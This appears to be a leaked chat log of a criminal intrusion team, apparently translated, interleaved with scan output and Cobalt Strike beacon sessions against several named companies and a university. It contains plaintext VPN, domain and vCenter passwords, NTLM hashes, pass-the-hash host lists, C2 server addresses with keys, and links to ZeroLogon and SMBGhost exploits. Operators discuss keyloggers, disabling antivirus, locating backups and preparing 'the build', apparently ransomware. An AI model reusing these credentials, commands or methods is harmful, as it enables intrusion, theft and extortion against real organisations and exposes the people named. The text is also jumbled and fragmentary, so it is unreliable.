[*] 172.16.200.201:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:8w 4d 22h 43m 14s) (guid:{4554f05b-d2bb-4360-8865-ddbe7471fc85}) (authentication domain:AD)
[+] 172.16.200.201:445 - Host is running Windows 2016 Datacenter (build:14393) (name:BAILEY) (domain:AD)
[*] 172.16.200.203:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{e99ea7d1-5c89-4ae0-b047-78f326de10d8} (authentication domain:AD)
[*] 172.16.200.206:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 5h 5m 47s) (guid:{e0c5eab0-e28b-4a1d-b71a-025035e36430}) (authentication domain:AD)
[+] 172.16.200.206:445 - Host is running Windows 2016 Datacenter (build:14393) (name:TERMINUS) (domain:AD)
[*] 172.16.200.210:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:2d 12h 1m 14s) (guid:{a847ccbe-32a9-4d56-a2d5-ca2953739b62}) (authentication domain:AD)
[+] 172.16.200.210:445 - Host is running Windows 2016 Datacenter (build:14393) (name:COLL-API) (domain:AD)
[*] 172.16.200.214:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 4h 6m 26s) (guid:{216b6279-4ffe-430a-9444-0d091cdaa779}) (authentication domain:AD)
[+] 172.16.200.214:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CROA-DB) (domain:AD)
[*] 172.17.6.9:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.6.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.9.6:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.9.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.9.39:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{70db2ac9-f957-4efe-a7b4-7287b42b2b59}) (authentication domain:AD)
[*] 172.17.10.36:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{faa6e913-de51-4214-9e63-459d17dd919a}) (authentication domain:AD)
[*] 172.17.10.2:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.10.3:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.2:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.3:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.5:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.6:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.10:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.11:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.16:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.17:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.18:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.19:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.20:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.22:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.23:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.24:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.25:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.26:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.27:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.28:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.29:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.30:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.31:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.32:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.33:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.34:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.35:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.37:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.38:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.39:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.40:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.41:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.42:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.44:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.43:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.45:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.46:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.47:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.48:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.49:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.50:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.51:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.52:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.53:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.54:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.55:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.57:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.59:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.60:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.61:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.62:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.63:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.64:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.65:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.66:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.67:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.68:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.70:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.71:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.72:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.74:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.75:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.76:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.82:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{69662d727265-7265-0079-0000000000000000}) (authentication domain:R-FIERY)
[*] 172.17.202.77:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.78:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.81:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.187:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[+] 172.17.202.187:445 - Host is running VxWorks (workgroup:MSHOME)
[*] 172.17.202.84:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{69662d70-7265-0079-0000-000000000000) (authentication domain:P-FIERY)
[*] 172.17.202.84:445 - Host could not be identified: Windows 6.1 (Samba 4.4.6)

Anyone who has problems with dedicas - come to me:sunglasses:for questions to @user8 he is a guru in this, I'll send you a scan of the network UserName: alangvardt Password: Crimson24! Domain: SNU`
Valid account, log in under it and download the client for vpn``

https://204.126.2.44
UserName: alangvardt Password: Crimson24! Domain: SNU
userName: conmille Password: #Spr1gTym Domain: SNU
userName: hculbert Password: /Roma/1974/ Domain: SNU
userName: dtompkin Password: HobbyLobby2019! Domain: SNU



[!!!] Found Active Directory creds
[+] AD creds :@atlantis.ad.snu.edu

[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 97, 'name': 'JeneSys', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '172.16.100.88'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 97, 'name': 'Science Lab', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '172.17.8.254'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 1, 'name': 'Laserfiche Remote Access', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'laserfiche.snu.edu'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 290, 'name': 'tracdat1', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat/faces/assessment/unit_planning/assessmentPlan.xhtml'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 312, 'name': 'TracDat', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'tracdat.snu.edu/tracdat/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 312, 'name': 'Laserfiche', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://laserfiche.snu.edu/Laserfiche/Login.aspx?db=SNU'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 235, 'name': 'Vdrive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'http://atlantis.ad.snu.edu/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 275, 'name': 'Network Drives', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'atlantis.snu.edu'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 358, 'name': 'snu', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'snu.edu'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Optimus', 'username': 'brent', 'password': 'f@lc0n95', 'service': 'SSH', 'host': 'optimus.csne.snu.edu'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 416, 'name': 'TracDat', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 395, 'name': 'Tracdat', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 395, 'name': 'Tracdat 2', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 395, 'name': 'Tracdat 3', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'tracdat.snu.edu/tracdat/faces/login.xhtml?fromLogout=true'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 407, 'name': 'V drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'atlantis.ad.snu.edu'}
```user9user8Acquired.
```
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
``Taken.
23.106.160.86
https://raills.com
-
104.194.8.114:61660
bQerl9O7K5s9pKDlz2PF3SNxtEIoIN9AUAL3 out of 4 sorted out?+@user8 there you got 2 more sessions from that netchat - orenco.com.telecomlabsinc.com input coba, went sessions first took 2 did not take 3 took
173.234.155.75
https://likenic.com
-
104.243.40.126:38542
JI07HSLOl2MtjxWe0UhqpolvHLJPZCAcL6M
``````
204.16.247.229
https://instwp.com
-
199.127.60.227:52742
SP7PeWVtkJcPZlbXZOSlVpK4g61drpgJlUZ
``````
23.106.160.86
https://raills.com
-
104.194.8.114:61660
bQerl9O7K5s9pKDlz2PF3SNxtEIoIN9AUAL
``````
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
``https pick up yourselves, 4 pieces ready, I'll give them here and you disassemble them yourself, just write down who picked up what on the new sootv pulling from the input above the grid in the work to finish on the old and another announcement, you koba update http://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon input coba```
199.127.60.67:20656
hPElm480XYW7rRX0fS7wSZU6owX4MJuSNey
``https://www.exploit-db.com/exploits/48537ну in general you should look for additional vector and additional task to find this case) in the rep lies only in the rep and the folder in the folder which he opens lies in the folder ëèosalvot here pay attention to the gif
https://github.com/danigargu/CVE-2020-0796
```:thinking:but i need to look and there is another option with rce)like on the ms17-010?
for goost need a session, no? and one more thing, about dead spots, did you do scans on the smbgost? and today put the buildda ok, let's do a story there and gather information on the offsets avera)
but i was there yesterday, i don't know how to check it but i don't know if it's critical, the scale is small and looking for ways to unscramble it) ok then solve the problem with EDR on all servers there are pinged +- 100-80252 machines without a server how many users?
0 Objects returned
are there any trusts? 20 pcs.... seriously?)file already if there is not enough buffer length let's mark at once that if it fits in the message - write in the message ``
DC:
	ITCMA-FILE03.ITC.LOCAL 10.10.0.22
	ITCMA-FILE02.ITC.LOCAL 10.0.0.38
	ASITC-DC01.ITC.LOCAL 192.168.0.221
	ITC-DC-SVR01.ITC.LOCAL 10.0.0.14

RDS:
	ITCMA-RDS01.ITC.LOCAL 10.0.0.8
	ITCMA-RDS-SVR01.ITC.LOCAL 10.0.0.6

Web Server:
	ITC-SHIP01.ITC.LOCAL 10.0.0.18
	ITC-APP01.ITC.LOCAL 10.0.0.17
	ITC-SQL01.ITC.LOCAL 10.0.0.16
	ITC-PLM01.ITC.LOCAL 10.0.0.23

Terminal:
	ITCMA-APP02.ITC.LOCAL 10.0.0.79
	ASITC-APP01.ITC.LOCAL 192.168.0.220
	ASITC-FILE01.ITC.LOCAL 192.168.0.227
	ITC-PLM02.ITC.LOCAL 192.168.0.224
	ITCMA-PDM01.ITC.LOCAL 10.0.0.165
	ITCMA-Print-SVR01.ITC.LOCAL 10.0.0.7

SQL:
	ITCMA-SQL02.ITC.LOCAL 10.0.0.81

Exchange:
	ITCMA-FILE01.ITC.LOCAL 10.0.0.39

Disabled:
	ITCMA-MITS01.ITC.LOCAL 100% loss
	ITCMA-PDM02.ITC.LOCAL 100% loss
How many servers are there in total? If there are not many you can try to shut down AV by hand, collect analytics on this and we will start with the number of servers. These are most likely the most critical of some @user3 found malware and bitdefender on itc-us.com servers had 4 servers? Or am I confused with another one?
Using GPO for Deployment

To install SecureAnywhere using GPO, you should have experience with Microsoft's Active Directory and the GPO editor.

You can also watch a video on how to use GPOs at How to Deploy Using Group Policy - SecureAnywhere Business.

To install SecureAnywhere using GPOs:

    From the following location, download the SecureAnywhere MSI installer to a network share:

    http://anywhere.webrootcloudav.com/zerol/wsasme.msi

    Downloading the file makes it accessible to all endpoints on which you will deploy SecureAnywhere.

    Go to the server that is the domain controller for the deployment group.
    Open the GPO editor on the domain controller and create a policy for the deployment group.
    Assign SecureAnywhere to all endpoints that belong to the Organizational Unit where the Group Policy is created.

    SecureAnywhere installs on the endpoints in the group when they restart.

``Two hours we work with these, then there will be new sessionsGood afternoonits-us.com - have
pkgprod.com - are what about the sessions?:flag_il:Good morning,good night to you allTomorrow by 3)Good, then we start at 3, the amount of work for tomorrow does not changeI only get out of bed at 14 I think that from now until tonight you have time to prepare the networks for the buildI do not understand is it convenient for you and you sleep until then?can even earlierWhy at 14? Write to the group on the current networks statusTomorrow we need to have two networks ready for the buildtomorrow by 14:00 still an hour we are working on the desktop shortcut to the web, something on the sol ...they seem to have such a system, but it also needs creeds)))) I'm not saying that it does not work at all do not save access to avs in browsers, but in password storage systems? keylogger koba* in sprouselaw from malware account keylogger and got it worked at all? keylogger koba itself is not the most working option in working except for keylogger, it turns out?
they don't save the credentials from av in chrome anywhere
keylogger put today on a bunch of machines, as a result keystrokes - roam-away-field as an option - access only in working hours I've already gone through a shitload of machines (where admins sit), no access from anywhere, it seems there are backups going to the cloud if admin not found How to look for cmd version disable on servers, etc. in other networks? no about it we did not find the av, admin
or do you mean the other? build what build?) today we have time to put the build? I have already offed the session
this is the account for the ASP.NET, most likely only used when installing it or something like that no user
[-] 10.7.0.199:445 - Account lockout detected on 'ASPNET', skipping this user.

The account is disabled. What is it? ASPNET is blocked everywhere (I've taken dumps everywhere)
no yes(
found another LA and microadmin
check them out
```

ASPNET:1005:aad3b435b51404eeaad3b435b51404ee:9ce556658be18cd8df47dbdb99bb3b32:::

	 * Username : rsantiagom
	 * Domain : CORP
	 * NTLM : 296ececefec7dda11a5a52a2a42a4217bb2bb
yes, in the process you still need to remove the hashes everywhere + these are the servers as I understand it? check everywhere we can move now
they are citrix hosts if i understand correctly
Checked the process at all and a couple of hashdumps removed
no yes and LA (most likely) everywhere the same(
```
pth .\Administrator 36906d0058d70ea02b5d8a81ee6e9144
 10.7.4.131
 10.7.5.196
 10.7.5.197
 10.7.5.38
 10.7.4.130
 10.7.5.41
 10.7.5.43
 10.7.4.45
 10.7.4.109
 10.7.4.47
 10.7.4.46
 10.7.5.37
 10.7.4.96
 10.7.5.146
 10.7.5.42
 10.7.5.147
 10.7.4.106
 10.7.4.107
 10.7.5.80
 10.7.4.72
 10.7.4.133
 10.7.4.134
 10.7.4.132
``was the mikehashdump taken off``?
corp.televisa.com.mx\gcastillom #hVbtYAI9buf
corp.televisa.com.mx\gemorenop #hVbtYAI9buf
corp.televisa.com.mx\jrortizc #hVbtYAI9buf
corp.televisa.com.mx\IPEREZJ #hVbtYAI9buf
```
it's weird, everyone's got the same fucking password + dll in place? ```
beacon> shell rundll32 C:\Windows\system32\mrtsvc.dll entryPoint
[*] Tasked beacon to run: rundll32 C:\Windows\system32\mrtsvc.dll entryPoint
[+] host called home, sent: 81 bytes
beacon> shell schtasks /query
[*] Tasked beacon to run: schtasks /query
[+] host called home, sent: 46 bytes
[+] received output:

Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 2/3/2021 1:00:00 PM Ready
ControlUp autoupdate#10514 2/3/2021 12:28:56 PM Ready
gpoAgentDeploy N/A Ready
Optimize Start Menu Cache Files-S-1-5-21 N/A Disabled
Optimize Start Menu Cache Files-S-1-5-21 N/A Ready


``Log from biconadai command to launch-fixed?
```
	corp.televisa.com.mx 10.7.5.196 SYSTEM * CORPKIOVDAPGM01
``LA''.
Teemo[SFE16537]pjfrancocru/16872|2021Feb03 21:05:28> shell net localgroup Administradores
[*] Tasked beacon to run: net localgroup Administradores
[+] host called home, sent: 61 bytes
[+] received output:
Nombre de alias Administradores
Comentario

Miembros

-------------------------------------------------------------------------------
Administrador
CORP\Domain Admins
CORP\EndPoint
CORP\pjfrancocru
CORP\SCMusr
CORP\SoporteDXC
Se ha completado el comando correctamente.

``you have YES? user9@tl1 add @user9 here i yanked it from the browser yesterday, i thought it would fit this from kerb?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=hGah3m4Ca2EBzcpg6) the creds are not valid (+there came?put the loadpokaem1 min@tl1 pulse session please://phanein.televisa.com.mx/vpn/logout.htmlb through the push configured then(Does not come to his mail on mail#1-done-crispregional-org what?the other one's in work i'm watching this one out of the corner of my eye while the other one's in work i'm waiting till it's on, when it's on i'll jump right away, i have everything ready, this is just a screen, is the VPN off in the domain?) as mantra dont forget sessions in slip everyone good night, then until tomorrow by 7 and go on vacation then finish tomorrow you are tough) so far the stats look like this
+ this is the domain where we are
TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with rights
WI.RWP.COM is some kind of a dead domain, just wine 2003
```
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +

TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
	              

POLYREY.COM Quarantined
RESOPAL.GER Quarantined
```

found avs, backups, spheres and creeds to us region
left backups/spheres in europe
Symantec
 
    admin
    pRe1Udlp!


dcwas79.Wilsonart.com - vcenter
    
    fowlerh@wilsonart.com
    R3f1nn3j2!
``Give me a brief report on the work so0.dead.forestriverinc.com what happened here?`` user5
>sAMAccountName: TIMECLOCK41$
>operatingSystem: Windows 8.1 Pro
``put the server sabinet on the 445 portas I'll look at the rest, maybe I missed something there only 301 tachksts no? ok, it's a deal then I'll help you here as much as I can work there + you work with me in the mouth? give 5 minutes now quickly sort out the servers and prepare it, it's not clear yet what the cost here how much? umm... i don't even see it, i'll re-scan it, it's a tool changer, i can't see the trusts file
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec25 20:05:02> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 105071 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 WWDC1 192.168.0.228
 WWDC2 192.168.0.222

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec25 20:05:18> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 105066 bytes
[+] received output:
List of domain trusts:

    0: WATERWAY waterway.com (Forest tree root) (Primary Domain) (Native)
```
well not visible yet) no trusts? ```
WATERWAY\Quser pdiC1137qu!
WATERWAY\Administrator 1853Gators
.
waterway\ssuser pdiC1137ssrs!
WATERWAY\Fpuser pdiC1137fp!
````DA`
```
Administrator Applied blauer
datavault DBunte djarden
domainrestore gkeller mapusatera
mharper Quser SEnglert
ServerAdmin$ techpartners veeam_admin
```
.
``EA``
```
Administrator CSE domainrestore
mapusatera ResultsTech ServerAdmin$
I will first subdata on the domain then yank dxinx right here on the progress of the tasks but at least you will know that there is something nearby just do not get there if chet will find, most likely will restrict the domain in another forest or something like thataga, there is a feeling that other networks must be where tonya 445postay tell from the current subnet on /16 maskstrano, trusts were not and all servers) well in adcom their -42 total net small however `` ``
172.0.0.188:443
172.0.0.187:443
10.70.4.252:53
10.70.3.240:3389
10.70.3.240:139
10.70.3.236:53
10.70.3.114:3389
10.70.3.114:139
10.70.3.56:3389
10.70.3.56:139
10.70.1.100:3389
10.70.1.100:443
10.70.1.100:139
10.70.1.100:80
``Portscan on the computers that are visible (15 pcs) on these ports
```
21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100
``bad of course ... and then as if the account is abandoned, because there are no files it apparently only works through the web da, this is in the plans to do nowbrazers no, but what is the current polzak there on the pc? in mssql can put the brute force would be a, patched services mssql and so the same zerologon option? there are several such exploits, but I have not attracted it
and in sharp or c there is no them (and in c they are always fallen) ah, well, only 2020-0796vertical within the current pc) I do not understand a little bit what it means within vpe) within vredlere exploits? did not understand) I mean lpe -> vredlere smbghost, msf have not pulled it tried? on gpp empty, zoopu, but I have not collected the dictionary
because I haven't used the browser here)
and passwords are nowhere else in fschet by the way on gpp? collected from browsers? mm-hmm, so you can brute force without loca``on
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30

``Give me a password policy no? there are a few 2008da there are some servers lol)2003, hp? skilkerb there are no passwords in usersmm, but yes one...in usersm there is what? but it does not lada
MCLOUD-SH32-6.mgrmedu.com
```
your current one? ``He's a dense one,`` but he's not ``sharfinder.``
Global Group memberships *MCLOUD-PORTAL-PINSTU *MSSO-POHS363
                             *Domain Users
``Whether or not I run the tools from the toolkit, by the way, does it have any privileges? If output to a file - I throw in a new session - the files are there but the tools work?same) psinject? lazagne.exeadfind also kicked out the session after it worked out execute-assembly? you have coba attached? only windef in your processes which av? no luck yet
i couldn't find the credentials.
no user anywhere
sessions are dropped after you run any tools like sitbelt, etc.and what tools did you run?
beacon> shell net localgroup administrators
[*] Tasked beacon to run: net localgroup administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
mgrmedu\AWS Delegated Server Administrators
mgrmedu\Domain Admins
mgrmedu\M-DLGTD-SVR-ADM
Rapyder-admin
ssm-user
The command completed successfully.


beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain mgrmedu.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.


beacon> shell net group "Enterprise admins" /dom
[*] Tasked beacon to run: net group "Enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain mgrmedu.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.



Domain Controllers:

 Server Name IP Address
 ----------- ----------
 WIN-BA6SF1HOCKI 10.70.4.252
 WIN-QL5L2UP8A9V 10.70.3.236
``````
172.17.70.10 vSphere - HQ-VCENTER-2.evo.local - Summary
``````
walking isoutsource
https://172.17.70.52:8444 network monitoring
http://192.168.80.1/ Meraki Cisco
https://172.17.70.52:8443 unifi-network
I can't believe this is happening.+tout flylodem put the same shelsession droppedthe cartel assembly just noticed that the top of the whole line is his nameThe Pink Panthers cartel criminal thunderstorm like a stranger looking directly into the soul (c) Looking for credits from the sphere and avv #wilsonart-com so far nothing...
of the current crits no admin, no vulnerability on ms17/netapi, at least on the servers, GPPP does not give anything, orb no quietly how are you doing? ok#alloypolymers-com preparing to close, divide themselves on both networking all hello, I will be late tonight and while I will not you work on #wilsonart-com and #alloypolymers-comok, good nighta, tomorrow by 6 to what time?good night to all thank you all for tonight) and until the end of the week for sure #wilsonart-com and tomorrow according to the plans of @user3 network for the closing join me
fast, coherent, accurateFirst I'll tell you that you're great, very good work give 10 minkyAndryukha we have a case, maybe close all the knights? + here all `missme.com` move on[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=KtrNZzD9bhmSBf9Th) Yes I'm watching the half eye ...[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=K3jwXPLpkFRXxPfm5) and I said that did not come[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=8wYFZdyroPrkL6ZbQ) Well personally you ask me, I do not do balimore, what's it to me? It's strange that the fix on the polzac, when the servers jumped the hell knows when@user4 ?) have not thought of that? you can already think that you can search for login through passwords vpnUsers you probably know ip vpn[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=iggYCy47Qf6fzWYEA) I'm what you have ad infos, you have dsink[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=nachfqHrSpAPeij9Z) and you?) then what do you mean by "accesses"? accesses above in the conf, no password and you can't find accesses from vpnA what's up with the polozack? what's up with vpn off?[ ](https://mediaeveryone.com/group/snpartners-com?msg=9DgDeXLzLH2H9aMgo) 1```
Shares for W088726121943:
	[--- Unreadable Shares ---]
		Caseys
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$
Shares for W08041912196:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W080419812194:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for MICSERVICE180:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for MICSERVICE160:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08041911194:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
